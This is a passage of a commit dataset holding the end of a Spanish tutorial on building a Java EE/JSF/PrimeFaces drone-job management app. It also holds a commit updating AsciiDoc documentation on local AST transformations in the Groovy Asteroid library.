que vamos a implementar, de la entidad Trabajo, donde tendremos que mantener la relaci\u00f3n desde Trabajo hacia Drone, que representa la selecci\u00f3n del drone que va a llevar a cabo el trabajo, y la relaci\u00f3n del trabajo con sus puntos de ruta, que representa la ruta que seguir\u00e1 el drone en ese trabajo. Y por otro lado tambi\u00e9n cabe realizar un CRUD de la entidad Drone donde no cabe el mantenimiento de la relaci\u00f3n desde Drone a Trabajo ya que cuando por ejemplo creamos un drone no tiene sentido en nuestro caso asignarle en el mismo caso o en otro diferente uno o m\u00e1s trabajos.\n\nCentr\u00e1ndonos en el mantenimiento de la entidad Trabajo empecemos con su resoluci\u00f3n. Por partes, hacemos primero un an\u00e1lisis, luego el dise\u00f1o de la interfaz y por \u00faltimo vemos la implementaci\u00f3n de cada capa.\n\nLa lista de requisitos extraida de la entrevista con el cliente es la siguiente:\n\n.Lista de requisitos del mantenimiento de trabajos\n[width=\"90%\"]\n|===\n|[small]*Pantalla de listado de trabajos*\n|[small]#Inicialmente se presentar\u00e1 un listado de trabajos en pantalla.#\n|[small]#El listado se debe ordenar por todos sus campos y se presentar\u00e1 paginado.#\n|[small]#Sobre el listado dispondremos de comandos para Editar, dar de baja y dar de baja definitiva un trabajo.#\n|[small]#La baja definitiva debe ser confirmada.#\n|[small]*Pantalla de mantenimiento de trabajo*\n|[small]#Todos los campos se validar\u00e1n presentando mensajes adecuados.#\n|[small]#Se presentar\u00e1 un listado de los drones disponibles seg\u00fan la fecha del trabajo.#\n|[small]#La ruta se importar\u00e1 desde un excel generado por la aplicaci\u00f3n de gesti\u00f3n de mapas usada para la definici\u00f3n de rutas sobre mapa.#\n|===\n\nPosteriormente a la definici\u00f3n de los requisitos decidimos si usar o no una librer\u00eda JSF espec\u00edfica que nos aporte capacidades adicionales en la capa de presentaci\u00f3n. Nuestras pantallas usar\u00e1n listados con capacidades de ordenaci\u00f3n, paginaci\u00f3n, etc. Adem\u00e1s necesitamos acciones con confirmaci\u00f3n. El coste de incluir la librer\u00eda es muy bajo y finalmente optamos por incluir una en nuestro proyecto. Entre RichFaces y Primefaces elegimos la segunda por sus caracter\u00edsticas en cuanto a n\u00famero de componentes, curva de aprindizaje, documentaci\u00f3n, comunidad y tendencia exponencial de incremento en el uso en nuevos proyectos.\n\nNOTE: Si quer\u00e9is comparar la popularidad de distintas tecnolog\u00edas usad Google Trends. Tendr\u00e9is que a\u00f1adir los t\u00e9rminos que identifiquen a cada tecnolog\u00eda. Y hay que cuidar que el t\u00e9rmino no recoja resultados no deseados. Por ejmeplo si quer\u00e9is ver la tendencia del framework ionic para aplicaciones h\u00edbridas escribir \"ionic framework\" y no \"ionic\" a secas. La URL es https:\/\/www.google.es\/trends[\u00e9sta]. \n\nA\u00f1adimos PrimeFaces al proyecto. Adem\u00e1s, optamos por trabajar con la \u00faltima versi\u00f3n de JSF. La versi\u00f3n que trae EAP 6.3 es la 2.1. Se ha intentado seguir el procedimiento existente en la web para incluir la \u00faltima versi\u00f3n en este servidor pero no ha sido posible. En resumen el proceso pasa por bajar una aplicaci\u00f3n Maven desde Github que genera un fichero CLI que realiza el deploy de los tres slots para los tres m\u00f3dulos que se ven afectados por la actualizaci\u00f3n. Sin embargo uno de los slots da problemas ya que parece que el script est\u00e1 actualizado para operar con las versiones iniciales del servidor Wildfly y no del EAP.\n\nDe modo que optamos por adoptar el nuevo servidor Wildfly en su \u00faltima versi\u00f3n, la 9.0.1, y as\u00ed tener disponible una plataforma Java EE 7 completa. Lo primero ser\u00e1 descargar el fichero de instlaci\u00f3n del servidor http:\/\/wildfly.org\/downloads\/[aqu\u00ed]. Ten\u00e9is que elegir la primera de las opciones, la que tiene la versi\u00f3n 9.0.1.Final.\n\nNOTE: Descargaos tambi\u00e9n los Quickstarts porque os van a venir muy bien como material de consulta en las etapas iniciales de la implementanci\u00f3n de un nuevo proyecto sea cual sea la naturaleza de \u00e9ste.\n\nUna vez instalado WildFly lo a\u00f1adimos a Eclipse como nueva unidad de ejecuci\u00f3n. La versi\u00f3n de las JBoss Tools s\u00f3lo ofrec\u00eda un conector para la versi\u00f3n 8 del servidor pero despu\u00e9s de las pruebas de arranque y parada parece que para un uso sencillo no tendremos problemas con esto.\n\nNOTE: Si no lo hab\u00e9is hecho a\u00fan versionad bajo Git el proyecto y cread el correspondiente repositorio remoto en GitHub para ir publicando vuestras releases. \n\n\u00bfQu\u00e9 cambios tendremos que hacer en nuestro proyecto tras el cambio de servidor y la actualizaci\u00f3n de las versiones de las tecnolog\u00edas? En primer lugar tendremos que adaptar las dependencias Maven a las del nuevo servidor, un proceso sin demasiada complicaci\u00f3n. Para consultar los cambios en el c\u00f3digo que se produzcan durante el desarrollo de este post bajaos la release 1.1.x en https:\/\/github.com\/lametaweb\/jdrone\/archive\/1.1.0.zip[esta direcci\u00f3n].\n\nAprovechando que pom.xml ha variado he refactorizado el ciclo de construcci\u00f3n de modo que ahora existe un profile \"despliegue-recursos\" que se debe ejecutar la primera vez que despleguemos la aplicaci\u00f3n o bien si los recursos has sido eliminados por cualquier motivo. Esto lo he hecho para evitar los problemas derivados del bloqueo de la base de datos. Ten\u00e9is que crear un nueva configuraci\u00f3n de ejecuci\u00f3n: Bot\u00f3n derecho proyecto > Rus As > Run Configurations... > bot\u00f3n derecho sobre Maven build > New > En la entrada Goals escribir \"clean install -Pdespliegue-recursos\" y dar un nombre al nuevo perfil.\n\nEn segundo lugar, como vamos a subir desde JSF 2.1 a 2.2 actualizamos los espacios de nombres en el nodo raiz del fichero _faces-config.xml_. Adem\u00e1s tendremos que actualizar la faceta JavaServer Faces. La desmarcamos, esperamos a que se desinstale y la volvemos a marcar. Al a\u00f1adirla de nuevo la opci\u00f3n _JSF Implementation Library_ dejadla as\u00ed _Type > Disable Library Configuration_.\n\nPara comprobar que JSF 2.2 funciona correctamente modificamos nuestra p\u00e1gina index.xhtml para adaptarla a HTML5 y JSF 2.2, a\u00f1adiendo adem\u00e1s una etiqueta nueva en la versi\u00f3n 2.2.\n\nPara la adaptaci\u00f3n a HTML 5:\n\n`<!DOCTYPE html>`\n\nPara la adaptaci\u00f3n a JSF 2.2 cambiamos los espacios de nombres:\n\n`<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\"\n\txmlns:h=\"http:\/\/xmlns.jcp.org\/jsf\/html\"\n\txmlns:f=\"http:\/\/xmlns.jcp.org\/jsf\/core\">`\n\nFinalmente sustituimos:\n\n`<f:event listener=\"#{disponibilidadBean.listaEstadoDronesPorFecha()}\" type=\"preRenderView\" \/>`\n\npor:\n\n`<f:viewAction action=\"#{disponibilidadBean.listaEstadoDronesPorFecha()}\" onPostback=\"true\"><\/f:viewAction>`\n\nAdem\u00e1s ahora no se admitir\u00e1n los t\u00edpicos caracteres de espaciado `\\ ` y tendremos que sustituirlos por el equivalente c\u00f3digo unicode `\\ `.\n\nNOTE: La etiqueta viewAction es nueva en JSF 2.2. Asocia un evento a una p\u00e1gina y su uso es m\u00e1s flexible que el de la etiqueta event para acciones de precarga de datos de pantalla. En nuestra pantalla inicial el uso no sigue el patr\u00f3n habitual. Un uso m\u00e1s adecuado se ver\u00e1 en la implementaci\u00f3n de las pantallas de mantenimiento de trabajos.\n\nMuy bien, una vez que tenemos correctamente actualizado el entorno de trabajo comenzamos con la implementaci\u00f3n del caso de uso planteado. Como siempre habr\u00e1 que implementar las capas de presentaci\u00f3n y negocio. Empecemos por la primera.\n\nAntes de empezar con la primera pantalla hay que crear una plantilla que proporcione el maquetado de las pantallas de la aplicaci\u00f3n. Primefaces nos da la soluci\u00f3n con Grid CSS, una librer\u00eda de estilos con la que crearemos un layout responsive al estilo de Bootstrap. Antes de empezar con la implementaci\u00f3n dibujamos un boceto del layout para tener claro los divs que tengo que considerar.\n\nLa plantilla debe ser privada, por tanto va situada dentro de la carpeta _WEB-INF_. Una plantilla contendr\u00e1 en la cabecera elementos comunes a todas las p\u00e1ginas como gesti\u00f3n de la cach\u00e9 de cliente, estilos CSS comunes, y en el cuerpo el maquetado de la p\u00e1gina y dentro de cada elemento div (con estilos de Grid CSS) las etiquetas <ui:insert...> de Facelets para insertar el contenido.\n\nUna vez que tenemos lista nuestra plantilla, en la carpeta _\/jdrone\/src\/main\/webapp\/WEB-INF\/plantillas\/plantilla.xhtml_, y su hoja de estilos correspondiente, podemos empezar a implementar cada pantalla de la aplicaci\u00f3n en base a la plantilla.\n\nLa estructura de una p\u00e1gina ser\u00e1:\n\n[source,xhtml,indent=0]\n----\n\t<ui:composition...>\n \t<ui:define name=\"central\">\n \t...\n <\/ui:define>\n <ui:define name=\"logo\">\n \t\t<ui:include... \/>\n <\/ui:define>\n ...\n <\/ui:composition>\n----\n\nEl contenido de la zona variable, etiquetada con el nombre _central_ en la plantilla, se define en la p\u00e1gina en general al principio, para mayor claridad, dado que aqu\u00ed el orden no afecta. Como la zona del logo ser\u00e1 fija para todas las pantallas la implementamos en un panel (una p\u00e1gina xhtml privada) aparte y la a\u00f1adimos con un include que toma como el panel.\n\nEn primer lugar vamos a adaptar nuestra pantalla de consulta de los posts anteriores, de drones disponibles en una fecha, al uso de la plantilla, y movemos el contenido desde el fichero index.xhtml, que ahora se convertir\u00e1 en la pantalla inicial, al fichero consulta-inicial.xhtml.\n\nImplementamos el panel del logo e inclu\u00edmos una simple animaci\u00f3n en jQuery. Primefaces est\u00e1 basado en esta librer\u00eda Javascript que es conveniente conocer ya que su uso est\u00e1 muy extendido en la capa de presentaci\u00f3n de proyectos reales. Como nuestro proyecto incluye Primemefaces y \u00e9ste incluye jQuery no tenemos que a\u00f1adir la librer\u00eda de manera expl\u00edcita. En general, para cualquier proyecto, en p\u00e1ginas que no usen ninguna estiqueta de Primefaces incluiremos de manera expl\u00edcita la librer\u00eda jQuery embebida en Primefaces con las siguientes l\u00edneas:\n\n`<h:outputScript library=\"primefaces\" name=\"jquery\/jquery.js\" target=\"head\" \/>`\n`<h:outputScript library=\"primefaces\" name=\"jquery\/jquery-plugins.js\" target=\"head\" \/>`\n\nLo siguiente que necesitamos es un men\u00fa de opciones. Se opta por la cl\u00e1sica barra de men\u00fa. Como suele ocurrir cuando necesitamos alg\u00fan elemento para la capa de presentaci\u00f3n Primefaces nos da tambi\u00e9n en esta ocasi\u00f3n la soluci\u00f3n con el componente MenuBar. Tened en cuenta que la versi\u00f3n 5.2, abierta a la comunidad y usada en nuestro programa, tiene casi 150 componentes, y grancantidad de caracter\u00edsticas adicionales. Dibujamos las opciones y submen\u00fas que tengamos previstos para la aplicaci\u00f3n e implementamos el man\u00fa en un nuevo panel, de la misma manera que en el caso del logo.\n\nArrancamos el servidor y ejecutamos nuestro ciclo de construcci\u00f3n para ver c\u00f3mo queda todo en pantalla. Personalmente no me convence el aspecto por defecto del men\u00fa por lo que acudimos de nuevo a Primefaces para cambiar de Theme. De paso activamos los iconos de FontAwesome a\u00f1adiendo el correspondiente par\u00e1metro en el fichero _web.xml_ para tener una gama mayor de iconos para elegir.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/009\/post009-fig005.png[]\n\nPara cambiar el Theme tenemos que a\u00f1adir una dependencia de Maven, elegimos el Theme bluesky, m\u00e1s acorde con la Marca de la compa\u00f1\u00eda:\n\n[source,xml,indent=0]\n----\n <dependency>\n <groupId>org.primefaces.themes<\/groupId>\n <artifactId>bluesky<\/artifactId>\n <version>1.0.10<\/version>\n <\/dependency>\n----\n\nY a\u00f1adir un par\u00e1metro en el descriptor de despliegue, web.xml:\n\n[source,xml,indent=0]\n----\n <context-param>\n <param-name>primefaces.THEME<\/param-name>\n <param-value>bluesky<\/param-value>\n <\/context-param>\n----\n\nGuardamos los cambios. Si abrimos el fichero pom.xml observamos que se muestra un error en la dependencia a\u00f1adida, esto es debido a que esta dependencia no est\u00e1 en el repositorio Central. Tenemos por tanto que a\u00f1adir el repositorio de Primefaces a nuestra configuraci\u00f3n. Podemos hacerlo directamente desde la sugerencia que nos muestra Eclipse al poner el puntero del rat\u00f3n sobre el error. Introducid los datos tal y como aparecen en la siguiente figura:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/009\/post009-fig010.png[]\n\nPulsamos OK y Finish. Para afinar el estilo de la barra de men\u00fa a\u00fan m\u00e1s podemos modificar el estilo aplicado por el frmaework a los componentes que forman el men\u00fa. En la documentaci\u00f3n de Primefaces aparecen estos estilos pero lo m\u00e1s pr\u00e1ctico es ayudarnos de las herramientas de desarrollador de Chrome o Firefox para localizar f\u00e1cilmente los estilos aplicados a cada elemento sobre la propia pantalla y editarlos para ver los cambios _on the fly_.\n\n\nA\u00f1adid al principio del fichero _plantilla.css_ lo siguiente: \n\n[source,css,indent=0]\n----\n.ui-menubar{\n\theight: 1.em;\t\n\tpadding:0em !important;\t\n}\n.ui-menuitem{\n\theight: 1.8em;\n}\n----\n\nDesplegad los cambios en WildFly y comprobad que el nuevo aspecto de la pantalla es similar a \u00e9ste:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/009\/post009-fig015.png[]\n\nNOTE: Existe una herramienta muy interesante que evita los redespliegues en el servidor de desarrollo durante la implementaci\u00f3n de una aplicaci\u00f3n. Se trata de JRebel, http:\/\/zeroturnaround.com\/software\/jrebel\/. Es una herramienta de pago pero merece la pena bajar la versi\u00f3n demo y evaluar si nos merece la pena incluirla entre nuestro set de plugins.\n\nBien, para dejar lista la aplicaci\u00f3n para el comienzo de la implementaci\u00f3n de las dos pantallas de \"Gesti\u00f3n de trabajos\" movemos el contenido de index.html a consulta-inicial.xhtml y dejamos index.xhtml con un fondo de pantalla limpio como pantalla inicial de la aplicaci\u00f3n, a\u00f1adiendo una imagen de fondo.\n\nEmpezamos a\u00f1adiendo la p\u00e1gina que nos muestre la lista de trabajos. Tenemos que a\u00f1adir a cada item un bot\u00f3n para eliminarlo, y otro para modificarlo. Adem\u00e1s cada item tendr\u00e1 un link para la consulta de los detalles del trabajo. Por \u00faltimo a nivel de p\u00e1gina tendremos un bot\u00f3n para dar de alta un nuevo trabajo y otro para volver a la pantalla inicial.\n\nCreamos la p\u00e1gina trabajos.xhtml a partir de index.html. Escribiremos el c\u00f3digo necesario dentro del define del \u00e1rea \"central\". A continuaci\u00f3n creamos el backing bean para la p\u00e1gina, TrabajosBean.java, en la misma carpeta que DisponibilidadBean.java. \n\nEl \u00e1mbito para el backing bean debe extenderse hasta el \u00e1mbito de la vista, ViewScoped. Esto es necesario porque en esta p\u00e1gina vamos a implementar acciones que llaman a m\u00e9todos con par\u00e1metros y para que esta construcci\u00f3n en EL (Expression Language) sea posible el bean debe permanecer en memoria m\u00e1s all\u00e1 del \u00e1mbito de la petici\u00f3n.\n\nNOTE: Tened cuidado de elegir la clase ViewScoped correcta tras pulsar Ctrl + O. Tenemos que elegir javax.faces.view.ViewScoped y no javax.faces.bean.ViewScoped. La segunda clase es nueva en JSF 2.2 y totalmente compatible con CDI.\n\nLo siguiente es crear la clase de negocio. De momento iremos creando una para cada entidad persistente. Ya ten\u00edamos el bean de negocio de la entidad Drone, ahora creamos uno para la entidad Trabajo. Como para la entidad Trabajo necesitamos implementar las operaciones de persistencia t\u00edpicas de un CRUD: Crear, Modificar, Eliminar y Consultar, vamos a refactorizar el c\u00f3digo de los beans de negocio creando una superclase abstracta que contenga estas operaciones b\u00e1sicas, de manera que en la clase concreta s\u00f3lo ir\u00e1n las operaciones de negocio particulares de cada una.\n\nCreamos por tanto una nueva clase java con el nombre AbstractFacade.java en la carpeta _negocio_. Esta clase no necesita caracter\u00edsticas de bean EJB por lo que no a\u00f1adiremos ninguna anotaci\u00f3n. Y refactorizamos.\n\nLa clase TrabajoFacade inicialmente:\n\n[source,java,indent=0]\n----\npackage com.lametaweb.jdrone.negocio;\n\nimport javax.ejb.LocalBean;\nimport javax.ejb.Stateless;\n\n\/**\n * Session Bean implementation class TrabajoFacade\n *\/\n@Stateless\n@LocalBean\npublic class TrabajoFacade {\n\n \/**\n * Default constructor. \n *\/\n public TrabajoFacade() {\n \/\/ TODO Auto-generated constructor stub\n }\n\n}\n----\n\nLa clase TrabajoFacade refactorizada:\n\n[source,java,indent=0]\n----\npackage com.lametaweb.jdrone.negocio;\n\nimport javax.ejb.LocalBean;\nimport javax.ejb.Stateless;\nimport javax.persistence.EntityManager;\nimport javax.persistence.PersistenceContext;\nimport com.lametaweb.jdrone.persistencia.Trabajo;\n\n\/**\n * Session Bean implementation class TrabajoFacade\n *\/\n@Stateless\n@LocalBean\npublic class TrabajoFacade extends AbstractFacade<Trabajo>{\n\t\n\t@PersistenceContext(unitName = \"datosdrones\")\n private EntityManager em;\n\n \/**\n * Default constructor. \n *\/\n public TrabajoFacade() {\n \/\/ TODO Auto-generated constructor stub\n \tsuper(Trabajo.class);\n }\n \n protected EntityManager getEntityManager(){\n \treturn em;\n }\n\n}\n----\n\nObservad como la clase abstracta adem\u00e1s es gen\u00e9rica dado que utiliza el m\u00e9todo de consulta tipado y necesita referirse al tipo de la entidad que se gestiona en la subclase.\n\nEn primer lugar planteamos los m\u00e9todos de negocio\/dao que necesitamos, en este caso no necesito crear ninguno ya que en la superclase ya dispongo de un m\u00e9todo que lee todos los trabajos y otro que lee un trabajo por su ID. A continuaci\u00f3n iremos creando los componentes en la p\u00e1gina xhtml y en paralelo los elementos java que vayamos necesitando en la clase backing bean. Continuaremos dentro de un proceso iterativo hasta conseguir una p\u00e1gina de listado de trabajos libre de bugs. Es el momento de pasar a la p\u00e1gina de detalle de trabajo que nos va a servir para consulta y modificaci\u00f3n y para la que seguiremos el mismo proceso de implementaci\u00f3n.\n\nEmpezamos con la p\u00e1gina trabajos.xhtml, que iremos implementando y probando paso a paso. Implementad de forma met\u00f3dica y no mezclando funcionalidades. El primer paso ser\u00e1 simplemente mostrar la lista de trabajos en la pantalla. Aqu\u00ed os copio el estado de la p\u00e1gina y del backing bean con este primer paso implementado.\n\nLa p\u00e1gina:\n\n[source,xhtml,indent=0]\n----\n<ui:composition xmlns:ui=\"http:\/\/xmlns.jcp.org\/jsf\/facelets\"\n xmlns:h=\"http:\/\/xmlns.jcp.org\/jsf\/html\" \n template=\"\/WEB-INF\/plantillas\/plantilla.xhtml\"\n xmlns:p=\"http:\/\/primefaces.org\/ui\"\n xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\"\n xmlns:f=\"http:\/\/xmlns.jcp.org\/jsf\/core\">\n\t\n\t<f:metadata>\n\t\t<f:viewAction action=\"#{trabajosBean.actualizaModeloTrabajos()}\"><\/f:viewAction>\n\t<\/f:metadata>\n <ui:define name=\"central\">\n\t\t<!-- listado selecci\u00f3n trabajos -->\n\t\t<h:form>\n\n\t\t<p:dataTable var=\"trabajo\" value=\"#{trabajosBean.trabajos}\">\n\t\t <p:column headerText=\"N. Registro\">\n\t\t <h:outputText value=\"#{trabajo.numeroDeRegistro}\" \/>\n\t\t <\/p:column>\n\t\t \n\t\t <p:column headerText=\"Inicio\" priority=\"3\">\n\t\t <h:outputText value=\"#{trabajo.fechaHoraInicio}\" \/>\n\t\t <\/p:column>\n\t\t \n\t\t <p:column headerText=\"Finalizaci\u00f3n\" priority=\"2\">\n\t\t <h:outputText value=\"#{trabajo.fechaHoraFinalizacion}\" \/>\n\t\t <\/p:column>\n\t\t \n\t\t <p:column headerText=\"Drone\" priority=\"4\">\n\t\t <h:outputText value=\"#{trabajo.droneAsignado.numeroDeSerie}\" \/>\n\t\t <\/p:column>\n\t\t<\/p:dataTable>\n\t\t<\/h:form>\n\t<\/ui:define>\n\t\n\t<!-- contenido de zona logo -->\n <ui:define name=\"logo\">\n <ui:include src=\"\/WEB-INF\/paneles\/panelLogo.xhtml\" \/>\n <\/ui:define>\n\n\t<!-- contenido de zona barra menu -->\n <ui:define name=\"menu\">\n <ui:include src=\"\/WEB-INF\/paneles\/panelMenu.xhtml\" \/>\n <\/ui:define>\n \n\t<!-- TODO: contenido de otras zonas... -->\n\n<\/ui:composition>\n----\n\nY la clase:\n\n[source,java,indent=0]\n----\npackage com.lametaweb.jdrone.vista;\n\nimport java.util.List;\n\nimport javax.enterprise.context.RequestScoped;\nimport javax.inject.Inject;\nimport javax.inject.Named;\n\nimport com.lametaweb.jdrone.negocio.TrabajoFacade;\nimport com.lametaweb.jdrone.persistencia.Trabajo;\n\n@Named\n@RequestScoped\npublic class TrabajosBean {\n\t\n\tprivate List<Trabajo> trabajos;\n\t@Inject\n\tprivate TrabajoFacade trabajoFacade;\n\n\tpublic TrabajosBean() {\n\t\t\/\/ TODO Auto-generated constructor stub\n\t}\n\n\t\n\tpublic void actualizaModeloTrabajos(){\n\t\ttrabajos = trabajoFacade.findAll();\n\t}\n\t\n\t\n\tpublic List<Trabajo> getTrabajos() {\n\t\treturn trabajos;\n\t}\n}\n----\n\nA\u00f1adimos a continuaci\u00f3n los botones de eliminaci\u00f3n y edici\u00f3n a la tabla. La eliminaci\u00f3n la hacemos con una llamada ajax, que es el comportamiento por defecto en PrimeFaces, para que s\u00f3lo se actualice la tabla. Despu\u00e9s de comprobar que puedo eliminar un trabajo correctamente paso a implementar el cuadro de di\u00e1logo de confirmaci\u00f3n. En un borrado ya sea f\u00edsico o l\u00f3gico siempre poned antes una confirmaci\u00f3n. La manera m\u00e1s limpia de a\u00f1adir un cuadro de confirmaci\u00f3n es con un ConfirmDialog global.\n\nCuando implementamos operaciones de negocio con Hibernate ayuda bastante, durante la depuraci\u00f3n del c\u00f3digo, visualizar las sentencias SQL que Hibernate genera contra la base de datos, de modo que podamos detectar problemas con facilidad. Una primera aproximaci\u00f3n a esto es a\u00f1adir esta configuraci\u00f3n a Hibernate en el archivo _persistence.xml_:\n\n[source,xml,indent=0]\n----\n <property name=\"hibernate.show_sql\" value=\"true\"\/>\n <property name=\"hibernate.format_sql\" value=\"true\"\/>\n----\n\nPero esto s\u00f3lo nos sacar\u00e1 por la consola las sentencias SQL, sin los valores de los par\u00e1metros. Para mostrar estos valores tenemos que ajustar la configuraci\u00f3n de log4j a\u00f1adiendo el fichero log4j.properties en alguna carpeta del classpath y estableciendo las propiedades necesarias. Cuando necesitemos visualizar la consulta real lanzada por Hibernate contra la base de datos utilizaremos un driver de proxy jdbc como https:\/\/p6spy.github.io\/p6spy\/2.0\/install.html#generic[P6Spy].\n\n\n\n\n\n\n\n\n\n\nVER PRUEBAS CON ARQUILLIAN\nhttps:\/\/github.com\/wildfly\/boms\/tree\/master\/jboss-javaee-7.0-with-tools\n\n\n\n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"14f3e007025268685c6c7651f8904b2fb760069c","subject":"Fix docs broken reference","message":"Fix docs broken reference\n","repos":"januslynd\/asteroid,grooviter\/asteroid","old_file":"asteroid-docs\/src\/docs\/asciidoc\/local.adoc","new_file":"asteroid-docs\/src\/docs\/asciidoc\/local.adoc","new_contents":"== Local Transformations\n\n\"Local AST transformations are relative to the context they are applied to. In most cases, the context is defined by an\nannotation that will define the scope of the transform. For example, annotating a field would mean that the\ntransformation applies to the field, while annotating the class would mean that the transformation applies to the whole\nclass.\"\n-- Groovy official site\n\n=== Overview\n\nIn order to create a local transformation you need to:\n\n* Create an `annotation` annotated by `@Local`\n* Create an `implementation` of the transformation extending `AbstractLocalTransformation`\n* Your implementation should be annotated by `@Phase` with the proper\n local compilation phase value set.\n\n=== @Local\n\nIn a local transformation you normally use an annotation to mark those\nparts of the code you want to transform: classes, methods... That\nannotation should be annotated as well to tell the compiler that is\ngoing to be used as a transformation marker.\n\nYou can use `@Local` to annotate a marker annotation. The only\n**mandatory** argument is the AST implementation class. Implementation\nclasses should always extend\n`asteroid.local.AbstractLocalTransformation` class.\n\n[source,groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/AsList.groovy[]\n----\n\nIf `@Local` annotation does not indicate which type of element is\nallowed to annotate by the attribute `appliedTo` then is supposed to\nbe used over an element of type `TYPE`, meaning it will be applied\nover an entire class.\n\nUnderneath the `@Local` annotation is doing:\n\n[ditaa,align=center]\n.Local annotation transformation\n....\n\n +-------------------------------+ +------------------------------------------------------+\n | | | |\n | @Local(ImplementationClass) | | @Target([ElementType.TYPE]) |\n | | | @Retention(RetentionPolicy.SOURCE) |\n | |---------->| @GroovyASTTransformationClass(\"ImplementationClass\") |\n | | | |\n +-------------------------------+ +------------------------------------------------------+\n....\n\n=== `applyTo`\n\n`applyTo` attribute is used when the transformation is applied to any\nelement type other than `TYPE`: a method, annotation, field...etc.\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/WithLogging.groovy[]\n----\n\n<1> This annotation will be applied to method elements.\n<2> The class of the AST transformation implementation\n\n=== AbstractLocalTransformation\n\n`asteroid.local.AbstractLocalTransformation` exists to avoid some of the\ndefensive code that you would normally write at the beggining of an\nAST transformation.\n\nWhen coding an AST transformation you always check that the first node\nis an `AnnotationNode` and the second is the type of `ASTNode` you\nexpected to be annotated by the first node. Instead of coding that you\ncan use `AbstractLocalTransformation`.\n\nLets say I have an annotation `@ToMD5`. That annotation can only be\nused in elements of type `FIELD`:\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/ToMD5.groovy[]\n----\n\nI would like to create a method for every field annotated by `ToMD5`\nreturning the MD5 signature of the content of that field.\n\nIn order to implement that I'm using `AbstractLocalTransformation`:\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/ToMD5Impl.groovy[]\n----\n\n<1> Declaring when to apply this transformation with the annotation\n`@Phase` and the correspondent compilation phase.\n<2> Creating a class extending `AbstractLocalTransformation` and declaring\nthat the annotation and the affected node type are `ToMD5` and\n`FieldNode` respectively\n<3> The override method declares the correct generic type `FieldNode`.\n\nFrom this line on you don't have to be worried about casting first and\nsecond node passed to your transformation anymore.\n\nNOTE: Sometimes it comes handy to get a reference to\n`org.codehaus.groovy.control.SourceUnit`. In previous versions\n`SourceUnit` was passed as argument, but it forced to add an import\nwhether you used or not. Now it's present as a class field. Probably\nin future release won't be available directly but through specific\nfunctions.\n\n=== @Phase\n\n`@Phase` is a **required** annotation for both `global` and `local`\ntransformations that indicates in which compilation phase this\ntransformation will be applied.\n\nLets see how `@Phase` annotation is processed in a local transformation:\n\n[ditaa,align=center]\n.Local Transformation\n....\n\n +-----------------------------------------+ +---------------------------------------------------+\n | | | |\n | @Phase(Phase.LOCAL.SEMANTIC_ANALYSIS) | | @InheritConstructors |\n | |---------->| @GroovyASTTransformation(phase=SEMANTIC_ANALYSIS) |\n | | | |\n +-----------------------------------------+ +---------------------------------------------------+\n....\n\n`@Phase` annotation needs a value of type\n`org.codehaus.groovy.control.CompilePhase` enum, but because sometimes\nis hard to remember which phases are available depending on which type\nof transformation we are implementing and it would add one more import\nto our code, `Asteroid` provides a shortcut to these values:\n\n* `asteroid.Phase.LOCAL`\n* `asteroid.Phase.GLOBAL`\n\nThis way is always easier to remember how to get the proper\ncompilation phase. Here's an example:\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/AsListImpl.groovy[]\n----\n\n<1> This is a local transformation to be applied during `SEMANTIC_ANALYSIS` phase.\n\nThis transformation will be applied to those `ClassNode` instances\nannotated with `@AsList`.\n\n[sidebar]\n.Groovy friendly\n****\nWhen used over a local transformation implementation in Groovy, apart\nfrom indicating the compilation phase, underneath, it saves some of\nthe boilerplate code needed to implement an instance of\n`asteroid.local.AbstractLocalTransformation`.\n\nAlthough you can create an `AbstractLocalTransformation` in\nplain Java, you then will have to annotate your transformations like\nthe old days.\n****\n\n=== Compilation errors\n\nIf at some point you would like to stop the compilation process the\nbest approach is to use `addError` method. This method is available\nin both `AbstractLocalTransformation` and `AbstractGlobalTransformation`.\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/GrumpyImpl.groovy[]\n----\n\n=== Checks\n\nThere are many times when you have to check if all precoditions are\ncorrect before applying a given transformation. Without this sanity\ncheck, many things could go wrong. Checks labels are an effort to\navoid boiler plate code when checking the AST state. They are inspired\nin Spock blocks.\n\nBy default checks labels are available in Asteroid local\ntransformations. All you have to do is to structure your code using\nlabels `check` and `then`.\n\nHere's an example, it's a bit silly but I think it will easy to\nunderstand. We have a annotation called `@Serializable`.\n\nThe transformation `SerializableImpl` will make all classes annotated\nwith `@Serializable` to implement `java.io.Serializable`.\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/Serializable.groovy[]\n----\n\nAs constraints I want to make sure:\n\n- The annotated class package name should should start by 'asteroid'\n- The annotated class can only have two method at most\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/SerializableImpl.groovy[]\n----\n<1> Checking the annotated class belongs to a certain `package`\n<2> Checking that the annotated node has less than two methods\n<3> Transformation code\n\n[sidebar]\n.Limitations\n****\nPlease notice at the moment checks only have a very limited\nfunctionality. They only allow a **one-line** expression. And these\nexpressions can only see `doVisit` parameter values.\n****\n\nTo prove it, there's a test with an annotated class having two\nmethods:\n\n[source, groovy]\n----\ninclude::{testTest}\/asteroid\/local\/samples\/SerializableTest.groovy[tags=checkersShouldFail]\n----\n\nAnd the test... passes :)\n\n==== Your own transformations\n\nIf you would like to add this functionality in your project, you can\nuse Asteroid utility functions to inject this behavior in your code.\n\n[source, java]\n----\ninclude::{coreMain}\/asteroid\/internal\/PhaseTransformation.java[tags=addCheckTo,indent=0]\n----\n\nThis call is taken from Asteroid local transformations. Checking is added to method `doVisit`.","old_contents":"== Local Transformations\n\n\"Local AST transformations are relative to the context they are applied to. In most cases, the context is defined by an\nannotation that will define the scope of the transform. For example, annotating a field would mean that the\ntransformation applies to the field, while annotating the class would mean that the transformation applies to the whole\nclass.\"\n-- Groovy official 